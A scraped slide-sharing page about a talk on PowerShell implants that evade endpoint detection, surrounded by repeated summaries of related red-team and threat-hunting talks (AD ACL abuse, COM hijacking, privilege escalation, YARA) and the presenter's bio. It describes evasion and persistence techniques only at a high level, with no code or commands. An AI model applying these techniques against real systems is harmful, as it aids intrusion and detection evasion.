PowerShell is often considered a threat vector by security tools like Carbon Black due to its powerful capabilities. However, the presentation argues that PowerShell is not dead and outlines ways attackers have evolved their PowerShell techniques to avoid detection. It demonstrates a C# PowerShell implant that uses reflection to bypass detection and discusses exploiting COM objects and Junction folders to migrate between processes like Internet Explorer."
The Unintended Risks of Trusting Active DirectoryWill Schroeder
This presentation was given at Sp4rkCon 2018. It covers the combination of Active Directory and host-based security descriptor backdooring and the associated security implications.
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
This document summarizes information about three individuals - Andy, Rohan, and Will - who work at Specter Ops creating security tools like BloodHound. It provides details on their jobs, tool development experience, conference presentations, training experience, and Twitter accounts. It then outlines abuse primitives that can be exploited through misconfigurations in Active Directory object ACLs. Finally, it demonstrates how to use tools like PowerView, SharpHound, and BloodHound to find misconfigurations and attack paths in Active Directory.
COM Hijacking Techniques - Derbycon 2019David Tulis
The COM interface lies at the core of Windows, and subtle registry changes can interfere with this the OS in unexpected ways. COM hijacking allows an attacker to load a library into a calling COM-enabled process. It’s a feature, not a bug. While it is commonly used for persistence, some famous COM hijacks have led to more severe exploits. COM hijacking is already used by several families of malware, and it’s time that pentesters caught up on how to abuse this feature. This presentation will cover COM hijacking from start to finish; showing how to discover hijackable COM objects, how to use them offensively, and how to make the calling process remain stable. The blue team will not be forgotten; the talk will cover detection strategies for identifying and defending against COM hijacks.
Scott Sutherland discusses penetration testing thick applications. He explains why these applications create unique risks compared to web applications due to users having full control over the application environment. This allows attacks on trusted components, exposure of data and admin functions, and privilege escalation. Sutherland outlines the goals and process for testing thick applications, including common architectures, accessing the application, and testing the application's GUI, files, registry, network traffic, memory, and configurations to identify vulnerabilities.
The Unintended Risks of Trusting Active DirectoryWill Schroeder
This presentation was given at Sp4rkCon 2018. It covers the combination of Active Directory and host-based security descriptor backdooring and the associated security implications.
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
This document summarizes information about three individuals - Andy, Rohan, and Will - who work at Specter Ops creating security tools like BloodHound. It provides details on their jobs, tool development experience, conference presentations, training experience, and Twitter accounts. It then outlines abuse primitives that can be exploited through misconfigurations in Active Directory object ACLs. Finally, it demonstrates how to use tools like PowerView, SharpHound, and BloodHound to find misconfigurations and attack paths in Active Directory.
COM Hijacking Techniques - Derbycon 2019David Tulis
The COM interface lies at the core of Windows, and subtle registry changes can interfere with this the OS in unexpected ways. COM hijacking allows an attacker to load a library into a calling COM-enabled process. It’s a feature, not a bug. While it is commonly used for persistence, some famous COM hijacks have led to more severe exploits. COM hijacking is already used by several families of malware, and it’s time that pentesters caught up on how to abuse this feature. This presentation will cover COM hijacking from start to finish; showing how to discover hijackable COM objects, how to use them offensively, and how to make the calling process remain stable. The blue team will not be forgotten; the talk will cover detection strategies for identifying and defending against COM hijacks.
Scott Sutherland discusses penetration testing thick applications. He explains why these applications create unique risks compared to web applications due to users having full control over the application environment. This allows attacks on trusted components, exposure of data and admin functions, and privilege escalation. Sutherland outlines the goals and process for testing thick applications, including common architectures, accessing the application, and testing the application's GUI, files, registry, network traffic, memory, and configurations to identify vulnerabilities.
A look into exploiting LOLDriver vulnerabilities and adapting techniques utilized by unsigned driver loaders coming from the gaming community to create a new class of LOLDriver exploitation not currently seen in the penetration testing / red teaming communities.
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
The document discusses hacking SQL Server at scale using PowerShell. It provides an overview of PowerUpSQL, an open source PowerShell toolkit for SQL Server discovery, auditing, and privilege escalation. Key sections include SQL Server discovery techniques using PowerUpSQL, methods for escalating privileges such as from a domain user to SQL login or SQL login to sysadmin, and post-exploitation activities like impersonation. The presentation emphasizes the benefits of using PowerShell for SQL attacks including avoiding detection by running commands in memory and leveraging existing trusted tools.
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
This document discusses techniques for threat hunting on Windows systems. It covers key areas to focus on during incident triage like processes, network connections, filesystem artifacts and logs. It also describes general hunting scenarios using threat intelligence or without intelligence. Specific techniques and artifacts discussed include the Windows Task Scheduler, ShimCache, AmCache, RecentFileCache, rogue services, timeline analysis using MFT, DLL side loading, DLL injection rootkits, autoruns, and the Wdigest credential storage downgrade attack. The document provides details on what to look for and analyze to effectively hunt for threats on Windows.
Delivered 1 - day Practical Threat Hunting workshop at sacon.io in Bangalore,India balancing on developing the threat hunting program in organization, how and where to start from as well threat hunting demos as it would look on the ground with hands on labs for 100+ participants.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly we will look at how to prevent against these kind of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
The document provides an overview of a red team consultant's methodology for penetration testing engagements. It discusses various stages of an engagement including pre-engagement reconnaissance using tools like LinkedIn and domain research. It covers external testing techniques like NTLM brute forcing. Internal testing focuses on privileges escalation using tools like Mimikatz and movement using techniques like DLL hijacking. Reporting emphasizes providing a full narrative and findings of high quality over large quantities.
Upping the APT hunting game: learn the best YARA practices from KasperskyKaspersky
Have you ever wondered how Kaspersky discovered some of the world’s most famous APT attacks? Now, the answer is within your reach. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team (GReAT), will be sharing best practices on the use of YARA, an essential tool for APT hunters that can assist with the discovery of new malware samples, exploits and zero-days, speed up incident response, and increase your defenses by deploying custom rules inside your organization.
If you ever wanted to master YARA and achieve a new level of knowledge in APT detection, mitigation and response, now is your chance.
This brief webinar is based on Kaspersky’s exclusive training on YARA rules, which has already helped improve the APT detection strategies of many cybersecurity teams from leading businesses across the world. During the webinar, you will learn how to write test and improve effective YARA rules. You will also get a glimpse of some of our internal tools and learn how to maximize your knowledge for building effective APT detection strategies with YARA.
This practical webinar is useful for security researchers and incident response personnel, malware analysts, security engineers, network security analysts, APT researchers and IT security staff. The content is suitable for both beginners and seasoned YARA users. The full webinar can be seen: https://kas.pr/92tr
This document discusses techniques for hunting down target users on Windows domains after gaining initial access. It begins by outlining existing tools like psloggedon.exe and netsess.exe that can detect logged-in users but typically require administrator privileges. It then explores using domain data sources and PowerShell with tools like PowerView to profile and locate target users throughout the domain without administrator privileges. Various PowerShell commands like Invoke-UserHunter, Invoke-UserView, and Invoke-UserEventHunter are demonstrated for efficiently finding sessions and events associated with target users.
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in most IT security programs. It will also include a brief overview of the common skill sets and tools used by today’s security professionals. Finally, it will offer some basic advice for getting started in penetration testing. This should be interesting to aspiring pentesters trying to gain a better understanding of how penetration testing fits into the larger IT security world.
Additional resources can be found in the blog below:
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Windows privilege escalation by Dhruv ShahOWASP Delhi
Different scenarios leading to privilege escalation
Design issues , implementation flaws, untimely system updates , permission issues etc
We ain’t talking about overflows here , just logics and techniques
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
MacOS forensics and anti-forensics (DC Lviv 2019) presentation. Prepared specially for DC38032. Prepared by Oleh Levytskyi (https://twitter.com/LeOleg97)
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
Given at BSides Nashville 2017. The modern Windows Operating System carries with it an incredible amount of legacy code. The Component Object Model (COM) has left a lasting impact on Windows. This technology is far from dead as it continues to be the foundation for many aspects of the Windows Operating System. You can find hundreds of COM Classes defined by CLSID (COM Class Identifiers). Do you know what they do? This talk seeks to expose tactics long forgotten by the modern defender. We seek to bring to light artifacts in the Windows OS that can be used for persistence. We will present novel tactics for persistence using only the registry and COM objects.
Empowering red and blue teams with osint c0c0n 2017reconvillage
This talk will discuss Open Source Intelligence (OSINT) gathering tools and techniques that are highly useful and effective for both Blue teams and Red teams.
The document discusses the OWASP Top Ten project, which identifies the 10 most critical web application security risks. It provides an overview of OWASP, describes the Top 10 risks from 2013 and 2017, and explains changes between the two versions. For each risk, it gives a brief example and recommendations for prevention. The key topics covered are injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of vulnerable components, and insufficient logging/monitoring.
Social Engineering the Windows Kernel by James ForshawShakacon
One successful technique in social engineering is pretending to be someone or something you're not and hoping the security guard who's forgotten their reading glasses doesn't look too closely at your fake ID. Of course there's no hyperopic guard in the Windows OS, but we do have an ID card, the Access Token which proves our identity to the system and let us access secured resources.
The Windows kernel provides simple capabilities to identify fake Access Tokens, but sometimes the kernel or other kernel-mode drivers are too busy to use them correctly. If a fake token isn't spotted during a privileged operation local elevation of privilege or information disclosure vulnerabilities can be the result. This could allow an attacker to break out of an application sandbox, elevate to administrator privileges or even compromise the kernel itself.
This presentation is about finding and then exploiting the incorrect handling of tokens in the windows kernel as well as first and third party drivers. Examples of serious vulnerabilities such as CVE-2015-0002 and CVE-2015-0062 will be presented. It will provide clear exploitable patterns so that you can do your own security reviews for these issues. Finally I'll discuss some of the ways of exploiting these types of vulnerabilities to elevate local privileges.
The document discusses various topics related to .NET Framework and C#. It provides definitions of concepts like framework, CLR, and comparisons between C# and other languages. It also includes code examples in C# and Java for calculating directory size recursively. Quizzes are included to test understanding.
Runtime Environment Of .Net Divya RathoreEsha Yadav
The document discusses the .NET Framework and how it aims to unify programming models, simplify development, and introduce a common language runtime. It covers the design goals of the CLR including making development and deployment easier while providing a robust and secure execution environment. Examples are provided of how tasks like splitting a string that were complex in SQL can be simplified with the .NET Framework.
A look into exploiting LOLDriver vulnerabilities and adapting techniques utilized by unsigned driver loaders coming from the gaming community to create a new class of LOLDriver exploitation not currently seen in the penetration testing / red teaming communities.
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
The document discusses hacking SQL Server at scale using PowerShell. It provides an overview of PowerUpSQL, an open source PowerShell toolkit for SQL Server discovery, auditing, and privilege escalation. Key sections include SQL Server discovery techniques using PowerUpSQL, methods for escalating privileges such as from a domain user to SQL login or SQL login to sysadmin, and post-exploitation activities like impersonation. The presentation emphasizes the benefits of using PowerShell for SQL attacks including avoiding detection by running commands in memory and leveraging existing trusted tools.
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
This document discusses techniques for threat hunting on Windows systems. It covers key areas to focus on during incident triage like processes, network connections, filesystem artifacts and logs. It also describes general hunting scenarios using threat intelligence or without intelligence. Specific techniques and artifacts discussed include the Windows Task Scheduler, ShimCache, AmCache, RecentFileCache, rogue services, timeline analysis using MFT, DLL side loading, DLL injection rootkits, autoruns, and the Wdigest credential storage downgrade attack. The document provides details on what to look for and analyze to effectively hunt for threats on Windows.
Delivered 1 - day Practical Threat Hunting workshop at sacon.io in Bangalore,India balancing on developing the threat hunting program in organization, how and where to start from as well threat hunting demos as it would look on the ground with hands on labs for 100+ participants.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly we will look at how to prevent against these kind of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
The document provides an overview of a red team consultant's methodology for penetration testing engagements. It discusses various stages of an engagement including pre-engagement reconnaissance using tools like LinkedIn and domain research. It covers external testing techniques like NTLM brute forcing. Internal testing focuses on privileges escalation using tools like Mimikatz and movement using techniques like DLL hijacking. Reporting emphasizes providing a full narrative and findings of high quality over large quantities.
Upping the APT hunting game: learn the best YARA practices from KasperskyKaspersky
Have you ever wondered how Kaspersky discovered some of the world’s most famous APT attacks? Now, the answer is within your reach. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team (GReAT), will be sharing best practices on the use of YARA, an essential tool for APT hunters that can assist with the discovery of new malware samples, exploits and zero-days, speed up incident response, and increase your defenses by deploying custom rules inside your organization.
If you ever wanted to master YARA and achieve a new level of knowledge in APT detection, mitigation and response, now is your chance.
This brief webinar is based on Kaspersky’s exclusive training on YARA rules, which has already helped improve the APT detection strategies of many cybersecurity teams from leading businesses across the world. During the webinar, you will learn how to write test and improve effective YARA rules. You will also get a glimpse of some of our internal tools and learn how to maximize your knowledge for building effective APT detection strategies with YARA.
This practical webinar is useful for security researchers and incident response personnel, malware analysts, security engineers, network security analysts, APT researchers and IT security staff. The content is suitable for both beginners and seasoned YARA users. The full webinar can be seen: https://kas.pr/92tr
This document discusses techniques for hunting down target users on Windows domains after gaining initial access. It begins by outlining existing tools like psloggedon.exe and netsess.exe that can detect logged-in users but typically require administrator privileges. It then explores using domain data sources and PowerShell with tools like PowerView to profile and locate target users throughout the domain without administrator privileges. Various PowerShell commands like Invoke-UserHunter, Invoke-UserView, and Invoke-UserEventHunter are demonstrated for efficiently finding sessions and events associated with target users.
This presentation will provide an overview of what a penetration test is, why companies pay for them, and what role they play in most IT security programs. It will also include a brief overview of the common skill sets and tools used by today’s security professionals. Finally, it will offer some basic advice for getting started in penetration testing. This should be interesting to aspiring pentesters trying to gain a better understanding of how penetration testing fits into the larger IT security world.
Additional resources can be found in the blog below:
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
More security blogs by the authors can be found @
https://www.netspi.com/blog/
Windows privilege escalation by Dhruv ShahOWASP Delhi
Different scenarios leading to privilege escalation
Design issues , implementation flaws, untimely system updates , permission issues etc
We ain’t talking about overflows here , just logics and techniques
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
MacOS forensics and anti-forensics (DC Lviv 2019) presentation. Prepared specially for DC38032. Prepared by Oleh Levytskyi (https://twitter.com/LeOleg97)
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
Given at BSides Nashville 2017. The modern Windows Operating System carries with it an incredible amount of legacy code. The Component Object Model (COM) has left a lasting impact on Windows. This technology is far from dead as it continues to be the foundation for many aspects of the Windows Operating System. You can find hundreds of COM Classes defined by CLSID (COM Class Identifiers). Do you know what they do? This talk seeks to expose tactics long forgotten by the modern defender. We seek to bring to light artifacts in the Windows OS that can be used for persistence. We will present novel tactics for persistence using only the registry and COM objects.
Empowering red and blue teams with osint c0c0n 2017reconvillage
This talk will discuss Open Source Intelligence (OSINT) gathering tools and techniques that are highly useful and effective for both Blue teams and Red teams.
The document discusses the OWASP Top Ten project, which identifies the 10 most critical web application security risks. It provides an overview of OWASP, describes the Top 10 risks from 2013 and 2017, and explains changes between the two versions. For each risk, it gives a brief example and recommendations for prevention. The key topics covered are injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of vulnerable components, and insufficient logging/monitoring.
Social Engineering the Windows Kernel by James ForshawShakacon
One successful technique in social engineering is pretending to be someone or something you're not and hoping the security guard who's forgotten their reading glasses doesn't look too closely at your fake ID. Of course there's no hyperopic guard in the Windows OS, but we do have an ID card, the Access Token which proves our identity to the system and let us access secured resources.
The Windows kernel provides simple capabilities to identify fake Access Tokens, but sometimes the kernel or other kernel-mode drivers are too busy to use them correctly. If a fake token isn't spotted during a privileged operation local elevation of privilege or information disclosure vulnerabilities can be the result. This could allow an attacker to break out of an application sandbox, elevate to administrator privileges or even compromise the kernel itself.
This presentation is about finding and then exploiting the incorrect handling of tokens in the windows kernel as well as first and third party drivers. Examples of serious vulnerabilities such as CVE-2015-0002 and CVE-2015-0062 will be presented. It will provide clear exploitable patterns so that you can do your own security reviews for these issues. Finally I'll discuss some of the ways of exploiting these types of vulnerabilities to elevate local privileges.
The document discusses various topics related to .NET Framework and C#. It provides definitions of concepts like framework, CLR, and comparisons between C# and other languages. It also includes code examples in C# and Java for calculating directory size recursively. Quizzes are included to test understanding.
Runtime Environment Of .Net Divya RathoreEsha Yadav
The document discusses the .NET Framework and how it aims to unify programming models, simplify development, and introduce a common language runtime. It covers the design goals of the CLR including making development and deployment easier while providing a robust and secure execution environment. Examples are provided of how tasks like splitting a string that were complex in SQL can be simplified with the .NET Framework.
Production Debugging at Code Camp PhillyBrian Lyttle
This document provides an introduction to production debugging techniques. It discusses monitoring tools like Task Manager and Performance Monitor, debugging fundamentals like stack traces and crash dumps, protocol analysis, and remote debugging. The goal is to help developers effectively debug problems in production environments using tools that don't require a development workstation.
This document discusses techniques for hijacking the .NET framework and Just-In-Time compiler to monitor and analyze PowerShell commands at runtime. It provides background on PowerShell attacks, .NET fundamentals like assemblies and the JIT compiler, and methods for decompiling and manipulating .NET binaries. The goal is to allow PowerShell to run normally while analyzing obfuscated commands and remaining stealthy to avoid detection.
The document discusses various topics related to .NET and C# programming including the .NET framework, garbage collection, functional programming with F#, dynamic languages like IronPython and IronRuby, and best practices for .NET development. It provides examples of code in C#, F# and IronPython and asks several quiz questions to test understanding.
This document provides an overview of CodeIgniter, a PHP framework. It discusses CodeIgniter's architecture including MVC structure, controllers, models and views. It also covers CodeIgniter's core features like routing, libraries, helpers and security features. Comparisons are made between CodeIgniter and other PHP frameworks like CakePHP and Zend. A demo of CodeIgniter is planned.
Sebastien Thomas, System Architect at Coyote Amerique, gave a presentation on operator frameworks. His talk covered how Operator SDK can be used to create Kubernetes Operators with Go.
The document provides an overview of parallel development and Microsoft's investments in parallel computing technologies. It discusses the difficulty of writing parallel code and introduces some of Microsoft's tools and APIs to help developers write parallel and concurrent applications more easily, including the Task Parallel Library (TPL) and Parallel LINQ (PLINQ). It encourages developers to experiment with and provide feedback on these new parallel programming models and tools.
Beyond Breakpoints: A Tour of Dynamic AnalysisC4Media
Video and slides synchronized, mp3 and slide download available at URL http://bit.ly/2dXUUTG.
Nathan Taylor provides an introduction to the dynamic analysis research space, suggesting integrating these techniques into various internal tools. Filmed at qconnewyork.com.
Nathan Taylor is a software developer currently employed at Fastly, where he works on making the Web faster through high performance content delivery. Previous gigs have included hacking on low-level systems software such as Java runtimes at Twitter and, prior to that, the Xen virtual machine monitor in grad school.
How to write clean & testable code without losing your mindAndreas Czakaj
If you create software that is to be developed continuously over several years you'll need a sustainable approach to code quality.
In our early days of AEM development, however, we used to struggle with code that is rigid, hard to test and full of LOG.debug calls.
In this talk I will share some development best practices we have found that really work in actual AEM based software, e.g. to achieve 100% code coverage and provide high confidence in the code base.
Spoiler alert: no new libraries, frameworks or tools are required - once you know the ideas, plain old TDD and the S.O.L.I.D. principles of Clean Code will do the trick.
by Andreas Czakaj, mensemedia Gesellschaft für Neue Medien mbH
Presented at the adaptTo() 2017 conference in Berlin (https://adapt.to/2017/en/schedule/how-to-write-clean---testable-code-without-losing-your-mind.html).
Presentation video can be found on YouTube (https://www.youtube.com/watch?v=JbJw5oN_zL4)
This document provides instructions for interpreting debug output on a Cisco router. The steps have a student configure debugging for IP routing on router R1. Interface Serial 0/0/0 between R1 and R2 is then configured with an IP address. Debug messages indicate the route is added but its state is initially false since the remote side is not yet configured. After fully configuring the local interface, debug output shows the interface state change to down until the remote side is also configured. The steps aim to demonstrate how debug output can provide insight into route states during router configuration.
.Net Hijacking to Defend PowerShell BSidesSF2017 Amanda Rousseau
With the rise of attacks implementing PowerShell in the recent months, there hasn’t been a solid solution for monitoring or prevention. Currently Microsoft released the AMSI solution for PowerShell v5 however this can also be bypassed. This talk will focus on utilizing various stealthy runtime .NET hijacking techniques implemented for blue teamer defenses for PowerShell attacks. The paper will start with a light intro into .NET and PowerShell, then a deeper explanation of various attacker techniques which will be explained in the perspective of the blue teamer. Techniques include assembly modification, class and method injection, compiler profiling, and C based function hooking.
LogChaos: Challenges and Opportunities of Security Log StandardizationAnton Chuvakin
LogChaos: Challenges and Opportunities of Security Log Standardization
Abstract: The presentation will discuss how to bring order (in the form of standards!) to the chaotic world of logging. It will give a brief introduction to logs and logging and explain how and why logs grew so chaotic and disorganized. Next it will cover why log standards are sorely needed. It will offer a walkthrough that highlights the critical areas of log standardization. Past failed standards will be looked at and their lessons learned. Finally, current logging standard efforts will be presented briefly.
The document discusses various .NET debugging techniques, including:
1. The importance of debugging and the tools available for debugging .NET applications, such as Visual Studio and Debugging Tools for Windows.
2. Basic debugging tasks like setting breakpoints, stepping through code, and examining variables and call stacks.
3. Advanced techniques like debugging managed code, threads, and memory issues.
Debugging is an important part of the software development process that helps developers write more reliable code. There are several tools available for debugging .NET applications, including Visual Studio and Debugging Tools for Windows. Some basic debugging tasks involve setting breakpoints, stepping through code, examining variables and call stacks, and understanding memory usage and threads. Postmortem debugging techniques like dump file analysis can help debug problems that occur in production environments where live debugging is not possible.
MS Day EPITA 2010: Visual Studio 2010 et Framework .NET 4.0Thomas Conté
This document summarizes the history and features of Microsoft's .NET Framework. It discusses the major releases from .NET 1.0 in 2002 through the current .NET 4.0. For each release, it highlights new capabilities like Windows Forms, ASP.NET, WPF, WCF, and LINQ. It also summarizes new areas in .NET 4.0 like parallel computing, the dynamic language runtime, and improvements to ADO.NET, Entity Framework, and Windows Workflow Foundation.
The document discusses new features in Visual Studio 2010 and .NET Framework 4.0, including an improved IDE, new language features in C# 4.0, and the Managed Extensibility Framework. It provides examples of using Parallel LINQ, named and optional parameters in C#, and asynchronous programming in F#.
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
Our technology, work processes, and activities all are depend based on Operation Systems to be safe and secure. Join us virtually for our upcoming "The Hacking Games - Operation System Vulnerabilities" Meetup to learn how hacker can compromise Operation System, bypass AntiVirus protection layer and exploiting Linux eBPF.
Thug is a new low-interaction honeyclient for analyzing malicious web content and browser exploitation. It uses the Google V8 JavaScript engine and emulates different browser personalities to detect exploits. Thug analyzes content using static and dynamic analysis and logs results using MAEC format. Future work includes improving DOM emulation and JavaScript analysis to better identify vulnerabilities and exploit kits. The source code for Thug will be publicly released after the presentation.
SAP strikes back Your SAP server now counter attacks.Dmitry Iudin
In this presentation, we will demonstrate how attackers can compromise all SAP clients and gain private information from their machines by using the SAP server.
Similar to powershell-is-dead-epic-learnings-london (20)
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
Understanding User Behavior with Google Analytics.pdfSEO Article Boost
Unlocking the full potential of Google Analytics is crucial for understanding and optimizing your website’s performance. This guide dives deep into the essential aspects of Google Analytics, from analyzing traffic sources to understanding user demographics and tracking user engagement.
Traffic Sources Analysis:
Discover where your website traffic originates. By examining the Acquisition section, you can identify whether visitors come from organic search, paid campaigns, direct visits, social media, or referral links. This knowledge helps in refining marketing strategies and optimizing resource allocation.
User Demographics Insights:
Gain a comprehensive view of your audience by exploring demographic data in the Audience section. Understand age, gender, and interests to tailor your marketing strategies effectively. Leverage this information to create personalized content and improve user engagement and conversion rates.
Tracking User Engagement:
Learn how to measure user interaction with your site through key metrics like bounce rate, average session duration, and pages per session. Enhance user experience by analyzing engagement metrics and implementing strategies to keep visitors engaged.
Conversion Rate Optimization:
Understand the importance of conversion rates and how to track them using Google Analytics. Set up Goals, analyze conversion funnels, segment your audience, and employ A/B testing to optimize your website for higher conversions. Utilize ecommerce tracking and multi-channel funnels for a detailed view of your sales performance and marketing channel contributions.
Custom Reports and Dashboards:
Create custom reports and dashboards to visualize and interpret data relevant to your business goals. Use advanced filters, segments, and visualization options to gain deeper insights. Incorporate custom dimensions and metrics for tailored data analysis. Integrate external data sources to enrich your analytics and make well-informed decisions.
This guide is designed to help you harness the power of Google Analytics for making data-driven decisions that enhance website performance and achieve your digital marketing objectives. Whether you are looking to improve SEO, refine your social media strategy, or boost conversion rates, understanding and utilizing Google Analytics is essential for your success.
Gen Z and the marketplaces - let's translate their needsLaura Szabó
The product workshop focused on exploring the requirements of Generation Z in relation to marketplace dynamics. We delved into their specific needs, examined the specifics in their shopping preferences, and analyzed their preferred methods for accessing information and making purchases within a marketplace. Through the study of real-life cases , we tried to gain valuable insights into enhancing the marketplace experience for Generation Z.
The workshop was held on the DMA Conference in Vienna June 2024.
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfFlorence Consulting
Quattordicesimo Meetup di Milano, tenutosi a Milano il 23 Maggio 2024 dalle ore 17:00 alle ore 18:30 in presenza e da remoto.
Abbiamo parlato di come Axpo Italia S.p.A. ha ridotto il technical debt migrando le proprie APIs da Mule 3.9 a Mule 4.4 passando anche da on-premises a CloudHub 1.0.
Discover the benefits of outsourcing SEO to Indiadavidjhones387
"Discover the benefits of outsourcing SEO to India! From cost-effective services and expert professionals to round-the-clock work advantages, learn how your business can achieve digital success with Indian SEO solutions.
2. Contents
Introductions
+ Whoami / Whoarewe
What is PowerShell
+ Understand what PowerShell is / key components
+ Is it DEAD?
Evolution of PoshC2
+ Release timeline & changes
EDR
+ History & challenges (offensive)
+ Future predictions
June 2019
3. @benpturner
+ Managing Principal Security Consultant @ Nettitude
+ Lead the Global Red Team Operation @ Nettitude
+ 8 years as a Crest Team Leader (CHECK Team Leader - Infrastructure)
+ 4 years as a Crest Simulated Attack Specialist (CCSAS - STAR/CBEST)
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018)
